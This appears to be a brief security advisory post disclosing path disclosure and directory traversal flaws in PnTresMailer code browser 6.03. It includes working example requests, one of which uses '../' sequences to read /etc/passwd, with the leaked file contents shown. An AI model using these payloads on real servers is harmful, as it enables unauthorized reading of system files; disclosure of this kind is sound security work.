PnTresMailer code browser version 6.03 is susceptible to path disclosure and directory traversal attacks.
0a17793363214eba0be0a9ddbc2c21299703b7751b93939842febb4de75a715c
Hello All,
PnTresMailer code browser 6.03 is open to information disclosure.
Authors Site: http://canvas.anubix.net
+-[Examples:]-----+
[1]
www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&fileto
highlight=w00t
Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open
stream: No such file or directory in
/var/www/html/codebrowserpntm.php on line 130
Warning: highlight_file(): Failed opening
'codebrowserPnTM/pnTresMailer/w00t' for highlighting in
/var/www/html/codebrowserpntm.php on line 130
[2]
www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodow
nload=../../../../etc/passwd
Look what ive got...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
+-[Notes:]-------+
Author is yet to be informed, will do so tonight.
Regards
John C
JohnC@NoBytes.com